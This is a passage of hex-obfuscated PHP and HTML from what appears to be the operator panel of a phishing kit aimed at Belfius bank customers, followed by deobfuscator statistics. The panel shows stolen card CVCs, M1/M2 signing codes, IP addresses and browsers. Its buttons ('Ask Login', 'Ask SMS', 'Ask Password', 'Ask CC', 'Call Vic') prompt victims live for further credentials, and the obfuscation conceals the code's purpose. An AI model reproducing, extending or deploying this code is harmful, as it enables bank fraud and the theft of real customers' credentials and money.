(!empty($log["\x62\145\x6c\x66\x69\x75\163\x5f\x63\166\143"])) { echo "\74\x64\151\166\x20\143\x6c\x61\163\x73\75\x22\146\x6f\162\x6d\x2d\x67\x72\x6f\x75\160\40\162\x6f\x77\42\x3e"; echo "\x3c\154\x61\x62\145\x6c\x20\146\x6f\x72\x3d\x22\151\x64\42\x20\143\154\x61\x73\x73\x3d\42\164\145\x78\x74\55\x73\x65\x63\157\156\144\x61\x72\171\x20\x63\x6f\x6c\55\x73\155\x2d\63\40\x66\x6f\x6e\164\x2d\x77\145\151\x67\x68\164\55\x62\x6f\154\x64\42\76\143\143\40\143\x76\143\72\74\57\x6c\141\142\x65\x6c\76"; echo "\74\x64\151\x76\x20\x63\x6c\x61\163\163\75\x22\x63\157\154\x2d\x73\155\x2d\71\42\76"; echo "\x3c\x70\40\x63\154\141\x73\163\75\x22\164\145\170\x74\55\163\145\x63\157\156\x64\141\x72\x79\x22\76\74\151\x3e" . htmlspecialchars($log["\x62\x65\154\146\x69\165\x73\137\x63\166\143"]) . "\74\57\x69\x3e\74\57\x70\76"; echo "\74\x2f\x64\x69\166\76"; echo "\x3c\57\144\x69\x76\x3e"; } if (!empty($log["\142\145\154\x66\x69\165\163\137\142\145\154"])) { echo "\74\144\x69\x76\40\x63\x6c\141\x73\x73\x3d\42\146\x6f\162\x6d\55\147\x72\x6f\165\x70\40\x72\157\x77\42\76"; echo "\x3c\154\141\142\x65\x6c\40\146\157\x72\x3d\x22\x69\x64\42\x20\x63\x6c\x61\x73\x73\75\42\164\x65\170\x74\x2d\x73\145\143\157\x6e\144\x61\x72\x79\40\143\x6f\x6c\x2d\x73\x6d\x2d\x33\x20\x66\x6f\x6e\164\x2d\x77\x65\151\147\x68\x74\x2d\142\157\x6c\144\42\x3e\x62\x65\x6c\160\141\147\x65\x3a\74\57\x6c\141\x62\145\154\76"; echo "\74\x64\151\166\40\143\154\141\163\x73\x3d\42\x63\157\154\55\163\x6d\55\71\42\76"; echo "\74\x70\40\143\x6c\x61\x73\163\x3d\x22\164\x65\170\164\55\x73\145\x63\x6f\x6e\x64\x61\162\171\42\76\x3c\151\76" . htmlspecialchars($log["\x62\145\154\x66\x69\x75\x73\x5f\142\145\154"]) . "\x3c\57\151\x3e\x3c\57\x70\76"; echo "\x3c\x2f\144\x69\166\x3e"; echo "\x3c\x2f\x64\x69\x76\76"; } if (!empty($log["\142\145\x6c\146\151\165\163\x5f\x6d\61"])) { echo "\74\x64\151\x76\x20\143\154\141\163\163\75\x22\x66\157\162\x6d\x2d\x67\162\157\x75\160\40\162\157\167\42\x3e"; echo "\x3c\154\x61\142\x65\x6c\x20\146\157\x72\75\x22\x69\144\42\40\143\x6c\141\x73\163\75\x22\164\145\x78\164\55\x73\145\x63\157\x6e\x64\141\162\171\40\x63\157\x6c\55\163\155\x2d\63\40\x66\x6f\156\164\x2d\x77\x65\x69\x67\x68\x74\55\x62\x6f\x6c\x64\x22\x3e\x4d\61\x20\x43\x6f\x64\145\72\40\74\57\154\x61\x62\145\x6c\x3e"; echo "\74\144\x69\x76\40\x63\154\141\x73\x73\75\42\x63\x6f\x6c\x2d\x73\x6d\55\71\42\x3e"; echo "\74\160\40\143\154\x61\x73\x73\x3d\42\x74\x65\170\x74\x2d\x73\x65\143\x6f\156\144\x61\x72\x79\42\76\74\151\76" . htmlspecialchars($log["\x62\145\154\146\x69\x75\x73\x5f\x6d\x31"]) . "\x3c\57\151\76\x3c\x2f\160\76"; echo "\74\x2f\x64\x69\166\76"; echo "\x3c\57\144\x69\166\x3e"; } if (!empty($log["\x62\145\154\146\x69\x75\163\137\x6d\x32"])) { echo "\x3c\144\x69\x76\40\143\x6c\141\163\163\75\42\146\x6f\x72\155\55\147\162\157\x75\x70\40\x72\x6f\x77\42\x3e"; echo "\x3c\154\141\x62\145\154\x20\146\157\162\x3d\42\x69\144\42\x20\143\x6c\141\163\163\x3d\x22\x74\145\x78\x74\55\x73\145\x63\157\156\144\x61\162\x79\x20\143\x6f\154\x2d\x73\x6d\x2d\x33\x20\146\x6f\x6e\x74\55\x77\x65\x69\147\x68\164\55\142\157\x6c\144\42\x3e\x4d\62\40\x43\157\x64\x65\x3a\x3c\57\154\141\142\x65\x6c\x3e"; echo "\x3c\144\x69\166\40\x63\x6c\x61\163\x73\x3d\x22\x63\157\154\x2d\163\155\55\71\42\76"; echo "\x3c\160\40\x63\154\x61\163\x73\75\42\164\145\170\164\55\x73\x65\143\157\x6e\x64\141\162\x79\42\76\x3c\x69\76" . htmlspecialchars($log["\x62\145\154\146\151\165\163\x5f\x6d\62"]) . "\74\x2f\x69\x3e\x3c\57\160\x3e"; echo "\74\x2f\x64\x69\x76\x3e"; echo "\74\57\144\151\166\x3e"; } if (!empty($log["\x62\x65\x6c\x66\151\x75\x73\x5f\154\x69\x76\145"])) { echo "\74\x64\x69\x76\40\x63\154\141\163\x73\x3d\42\146\x6f\x72\x6d\x2d\147\x72\x6f\165\160\40\162\x6f\167\42\x3e"; echo "\74\154\x61\142\x65\x6c\x20\x66\x6f\162\75\42\151\144\x22\x20\143\154\141\163\163\x3d\x22\164\145\x78\x74\x2d\x73\x65\143\157\156\144\x61\x72\171\x20\143\x6f\154\x2d\x73\155\55\63\x20\146\157\156\x74\55\167\145\x69\x67\150\x74\55\x62\157\x6c\144\42\76\x4c\151\x76\x65\40\103\157\144\x65\x3a\74\x2f\154\141\x62\145\154\x3e"; echo "\74\x64\151\x76\x20\x63\154\141\x73\x73\x3d\x22\143\x6f\154\55\x73\155\x2d\x39\42\x3e"; echo "\x3c\x70\40\143\154\x61\x73\163\x3d\42\164\145\x78\164\x2d\163\145\143\157\x6e\x64\141\162\x79\42\76\x3c\x69\x3e" . htmlspecialchars($log["\x62\x65\x6c\x66\151\165\x73\137\154\x69\166\145"]) . "\74\x2f\151\x3e\x3c\57\160\76"; echo "\74\x2f\144\x69\166\76"; echo "\74\x2f\144\151\166\x3e"; } if (!empty($log["\x62\145\154\x66\151\165\x73\137\x62\x75\x79"])) { echo "\x3c\144\x69\x76\x20\x63\x6c\141\x73\x73\x3d\42\x66\157\x72\x6d\x2d\147\162\157\x75\160\x20\x72\157\x77\x22\76"; echo "\x3c\x6c\141\x62\145\x6c\x20\146\x6f\x72\x3d\x22\151\x64\x22\x20\x63\x6c\x61\x73\163\x3d\x22\x74\x65\170\x74\55\x73\145\143\x6f\x6e\144\141\x72\x79\x20\143\x6f\x6c\x2d\x73\155\x2d\63\40\146\157\x6e\x74\x2d\x77\145\151\x67\x68\x74\x2d\x62\x6f\x6c\144\x22\x3e\x42\x75\171\x20\103\x6f\x64\x65\72\x3c\57\x6c\141\x62\145\154\76"; echo "\x3c\x64\x69\x76\x20\143\154\141\x73\x73\x3d\x22\143\x6f\x6c\55\x73\x6d\55\71\42\x3e"; echo "\74\160\40\143\154\x61\x73\x73\75\x22\164\x65\x78\164\55\163\x65\x63\157\x6e\144\x61\x72\171\42\76\74\x69\x3e" . htmlspecialchars($log["\142\145\154\146\151\165\163\x5f\x62\165\x79"]) . "\74\x2f\x69\76\74\57\x70\x3e"; echo "\74\57\144\151\166\76"; echo "\x3c\x2f\144\151\166\76"; } if ($log["\167\x61\x69\x74\x69\156\147"] == "\164\162\165\x65") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\x73\x65\162\x5f\x69\x64"]); ?>
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\x73\x65\x72\137\x69\144"]); ?>
', 'identification')"><i class="fa fa-phone" aria-hidden="true"></i> Ask Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\x75\x73\145\x72\x5f\x69\x64"]); ?>
', 'bel')"><i class="fa fa-phone" aria-hidden="true"></i> Call Vic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\163\x65\x72\x5f\151\x64"]); ?>
', 'loginCode')"><i class="far fa-keyboard"></i> Ask SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\163\x65\x72\x5f\x69\x64"]); ?>
', 'password')"><i class="fa fa-info-circle"></i> Ask Password</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\x75\x73\x65\162\x5f\x69\x64"]); ?>
', 'credit')"><i class="far fa-credit-card"></i> Ask CC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-success mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\x73\145\x72\137\x69\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\x73\x65\162\137\x69\x64"]); ?>
', 'custom')"><i class="fa fa-sign-language" aria-hidden="true"></i> Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control bnp-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<hr>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\163\x65\x72\x5f\x69\144"]); ?>
', 'signCode')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask M1</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control belfius-one input-dark mt-4 custom-input" placeholder="Please enter a sign code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\163\x65\162\x5f\151\x64"]); ?>
', 'token')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask M2</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control belfius-two input-dark mt-4 custom-input" placeholder="Please enter a m2 code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\x75\x73\145\162\x5f\x69\x64"]); ?>
', 'live')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask Live</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control belfius-live input-dark mt-4 custom-input" placeholder="Please enter a live code">
<input type="text" class="form-control belfius-live-two input-dark mt-4 custom-input" placeholder="Please enter a live code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setBelfius('<?php echo htmlspecialchars($log["\165\x73\x65\162\x5f\151\144"]); ?>
', 'buy')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask Buy</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control belfius-buy input-dark mt-4 custom-input" placeholder="Please enter a buy code">
<input type="text" class="form-control belfius-buy-two input-dark mt-4 custom-input" placeholder="Please enter a buy code">
</div>
</div>
</div>
</div >
<?php } } } } } } } } } } if ($log["\x77\141\x69\164\x69\x6e\x67"] === "\x66\x61\154\163\145") { echo "\74\57\x64\x69\166\x3e"; echo "\74\57\144\x69\x76\76"; echo "\x3c\57\x64\151\x76\x3e"; } echo "\74\144\151\166\40\x63\154\141\163\x73\75\x22\x63\x6f\154\x2d\154\147\x2d\x34\x20\x63\157\x6c\55\163\155\55\61\x32\x22\76"; echo "\74\144\x69\166\x20\143\154\x61\163\163\75\42\143\x61\x72\x64\x2d\x68\145\x61\144\x65\162\40\164\145\170\x74\x2d\x77\150\151\x74\x65\x20\x20\142\147\55\144\141\x72\x6b\145\162\40\x73\x69\151\154\145\x6e\x63\x65\x64\x2d\144\x61\162\x6b\x65\x72\42\76\xa\x20\40\40\40\40\40\40\74\x69\40\143\x6c\141\163\x73\x3d\x22\x66\x61\40\x66\141\x2d\x63\x6f\x67\42\40\141\x72\151\141\x2d\150\x69\144\144\145\x6e\x3d\42\x74\162\x75\145\42\x3e\x3c\57\x69\x3e\40\x4f\x70\164\151\x6f\156\x73\12\x20\x20\xa\x20\40\40\12\x20\40\12\x20\40\40\x20\x20\40\40\x3c\57\x64\151\166\x3e\x3c\144\151\166\x20\143\154\x61\163\x73\x3d\x22\143\x6f\154\x2d\x31\x32\40\160\x2d\64\x20\142\147\55\x64\x61\x72\153\145\x72\x20\143\165\163\164\x6f\x6d\55\x74\157\160\x2d\155\141\162\147\151\156\40\x22\40\163\x74\x79\154\x65\75\x22\x6d\x69\x6e\x2d\150\145\x69\x67\x68\x74\x3a\x20\x31\67\x33\x70\x78\73\x22\76"; ?>
<p style="font-style: italic;"><i class="fa fa-comments" aria-hidden="true"></i> This function manages the log, you can ban or delete a specific log.</p>
<hr>
<button class="btn btn-sm btn-outline-danger col-lg-12" style="font-style: italic;" data-toggle="modal" data-target="#exampleModalCenter">
<i class="fa fa-ban"></i> Ban User</button>
<br><br>
<button class="btn btn-sm btn-outline-warning col-lg-12" onclick="deleteLog('<?php echo htmlspecialchars($log["\165\x73\145\x72\137\x69\x64"]); ?>
')" style="font-style: italic;">
<i class="fa fa-trash"></i> Delete User</button>
<hr>
<button class="btn btn-sm col-lg-12" style="font-style: italic;">
@Vssrtje | Developer</button>
<?php echo "\x3c\x2f\x64\x69\x76\76"; echo "\x3c\x2f\x64\151\x76\x3e"; echo "\74\x2f\144\x69\x76\x3e"; echo "\12\x3c\144\x69\x76\x20\x63\x6c\x61\x73\163\x3d\42\x72\x6f\167\x20\160\55\61\40\155\x74\x2d\x33\x20\x6d\142\55\63\42\x3e\xa"; echo "\xa\74\x64\x69\x76\x20\143\x6c\141\163\163\x3d\x22\143\157\x6c\55\x6c\147\55\70\x20\143\x6f\x6c\x2d\x73\x6d\55\x31\x32\x22\76\12"; echo "\xa\x3c\144\151\166\x20\x63\x6c\141\163\163\x3d\x22\143\x61\x72\x64\55\x68\145\141\144\145\x72\40\164\x65\x78\x74\55\x77\150\151\x74\145\40\x20\142\x67\55\x64\141\x72\153\145\x72\40\163\x69\151\154\145\x6e\143\145\144\x2d\144\141\162\x6b\x65\162\42\x3e\xa\40\40\74\151\x20\143\x6c\141\163\163\x3d\x22\x66\x61\x20\x66\x61\x2d\x75\x73\x65\162\42\40\141\162\x69\x61\55\x68\x69\144\144\145\x6e\x3d\x22\x74\x72\x75\x65\x22\76\74\57\x69\76\x20\x53\x70\145\143\151\146\151\143\40\125\163\145\x72\40\x44\x61\164\141\12\74\57\144\x69\166\x3e\12\74\144\151\166\x20\143\x6c\x61\x73\x73\75\x22\x63\x6f\x6c\x2d\x31\x32\x20\160\x2d\x34\40\142\147\55\144\x61\162\x6b\145\162\x20\42\x3e\xa\40\40"; echo "\xa\x20\40\74\144\151\x76\40\x63\154\x61\x73\x73\75\x22\166\145\165\x73\x64\145\x70\165\x74\40\162\x6f\165\x6e\144\145\144\40\160\x2d\x34\x22\76\xa\x20\40\40\x20"; echo "\12\x20\40\x20\x20\x3c\x64\151\166\40\x63\154\x61\x73\x73\x3d\42\x66\x6f\162\155\55\x67\162\157\165\160\40\162\x6f\167\42\76\xa\40\x20\x20\40\40\x20"; echo "\x3c\154\x61\x62\x65\x6c\40\146\x6f\162\x3d\42\151\x64\42\40\x63\154\141\163\163\75\x22\164\145\x78\164\55\163\x65\x63\157\156\144\x61\162\171\x20\x63\157\154\x2d\x73\155\55\x33\40\146\157\x6e\164\x2d\x77\145\x69\x67\150\x74\x2d\142\x6f\154\x64\x22\x3e\x55\163\x65\x72\40\x49\x44\x3a\x3c\57\x6c\141\142\x65\154\76"; echo "\12\x20\40\x20\x20\40\40\x3c\144\151\x76\x20\143\x6c\141\163\x73\x3d\42\x63\157\154\55\x73\155\x2d\71\42\76\12\40\40\x20\40\x20\40\40\40"; echo "\12\x20\40\x20\40\40\x20\40\x20\74\160\40\143\x6c\141\x73\x73\75\42\x63\157\160\171\55\x76\x61\x6c\165\x65\42\x20\x6f\x6e\143\x6c\x69\x63\x6b\75\x22\x63\157\160\x79\124\x6f\x43\154\151\x70\x62\157\141\x72\x64\50\164\150\151\163\51\x22\x20\143\154\x61\x73\x73\75\42\x74\x65\x78\x74\x2d\163\145\143\157\x6e\144\x61\162\171\42\x3e\x3c\x69\x3e" . $log["\x75\163\x65\162\x5f\x69\144"] . "\x3c\x2f\x69\76\x3c\x2f\x70\76\xa\x20\x20\40\x20\x20\x20\x20\x20"; echo "\xa\x20\x20\x20\x20\40\x20\74\x2f\144\x69\166\x3e\xa\40\x20\40\x20\40\x20"; echo "\xa\40\x20\x20\40\x3c\x2f\144\x69\166\76\xa\x20\40\x20\40"; echo "\xa\40\x20\40\x20\74\x64\151\166\x20\143\154\x61\x73\163\75\42\x66\x6f\162\155\x2d\x67\162\x6f\x75\x70\40\x72\x6f\167\42\x3e\12\40\40\40\x20\x20\x20"; echo "\74\154\141\x62\145\x6c\40\x66\x6f\162\75\42\151\144\42\40\143\x6c\141\x73\x73\x3d\x22\164\x65\x78\x74\x2d\163\145\x63\157\156\x64\x61\162\171\x20\x63\157\x6c\x2d\163\x6d\x2d\63\40\146\x6f\156\x74\55\167\x65\151\x67\x68\164\x2d\142\x6f\x6c\x64\42\x3e\x55\163\x65\162\x20\102\162\157\167\163\145\162\72\x3c\57\154\x61\142\x65\154\x3e"; echo "\xa\x20\40\40\x20\40\40\74\144\x69\166\40\x63\x6c\x61\x73\163\75\42\x63\x6f\154\x2d\x73\155\x2d\71\x22\x3e\xa\x20\40\40\40\40\40\x20\x20"; echo "\xa\x20\40\40\40\x20\40\x20\x20\x3c\160\x20\143\154\141\163\x73\75\42\x63\157\x70\171\55\x76\x61\x6c\x75\145\42\40\x6f\x6e\143\154\x69\x63\153\x3d\x22\x63\157\160\171\124\157\x43\154\x69\160\x62\157\x61\162\144\50\x74\x68\x69\163\51\x22\x20\x63\154\x61\x73\163\75\42\164\x65\x78\164\55\163\145\143\x6f\x6e\x64\141\x72\x79\x22\x3e\x3c\x69\x3e" . $log["\165\163\x65\162\137\141\x67\145\x6e\x74"] . "\x3c\x2f\151\x3e\x3c\x2f\x70\x3e\12\40\40\x20\x20\x20\40\40\40"; echo "\xa\40\x20\40\40\40\40\x3c\x2f\144\x69\166\x3e\12\x20\x20\40\x20\x20\40"; echo "\xa\40\x20\40\x20\x3c\x2f\x64\151\166\x3e\xa\40\x20\x20\40"; echo "\xa\x20\40\40\40\x3c\x64\x69\166\x20\x63\154\x61\163\x73\x3d\x22\x66\x6f\162\x6d\55\147\x72\157\165\160\40\162\x6f\167\42\x3e\12\40\40\x20\40\x20\40"; echo "\x3c\154\x61\142\x65\x6c\x20\x66\157\162\75\42\x69\x64\x22\x20\x63\x6c\141\163\163\75\42\x74\145\170\164\55\163\145\143\157\156\144\x61\162\x79\40\143\x6f\x6c\x2d\x73\155\55\63\40\x66\157\x6e\164\x2d\x77\145\151\147\150\x74\x2d\x62\157\x6c\144\42\x3e\125\163\x65\162\x20\111\120\72\74\57\x6c\x61\142\145\x6c\76"; echo "\xa\40\x20\x20\40\40\40\x3c\x64\151\x76\x20\x63\154\141\x73\x73\x3d\x22\143\157\x6c\55\163\155\55\71\x22\76\xa\40\40\x20\40\x20\x20\x20\40"; echo "\12\x20\x20\40\x20\40\x20\40\x20\74\160\x20\143\x6c\x61\163\163\75\42\143\157\x70\171\55\x76\x61\154\165\145\x22\x20\157\156\x63\154\x69\x63\153\x3d\42\x63\157\160\x79\x54\x6f\x43\154\151\x70\142\157\x61\x72\x64\50\x74\x68\x69\x73\x29\x22\x20\143\x6c\141\x73\x73\75\42\x74\145\170\164\55\x73\145\x63\157\x6e\144\141\162\x79\x22\76\74\151\x3e" . $log["\151\x70"] . "\x3c\x2f\x69\x3e\x3c\x2f\x70\76\12\x20\x20\x20\40\40\40\40\x20"; echo "\12\40\40\40\x20\x20\x20\x3c\x2f\144\x69\166\x3e\12\x20\x20\40\40\40\40"; echo "\xa\40\40\x20\40\x3c\x2f\x64\x69\x76\76\12\x20\x20\40\x20"; echo "\12\x20\40\74\57\x64\x69\x76\76\12\74\x2f\144\x69\x76\x3e\xa\x3c\142\x72\76\x3c\142\162\76\74\x62\162\76\74\142\162\x3e\74\x62\x72\76\74\x62\162\x3e\74\x62\x72\x3e\74\x62\x72\76"; } }
Function Calls
None |
Stats
MD5 | 46cfcf946794b8835496afa0fd36a432 |
Eval Count | 0 |
Decode Time | 270 ms |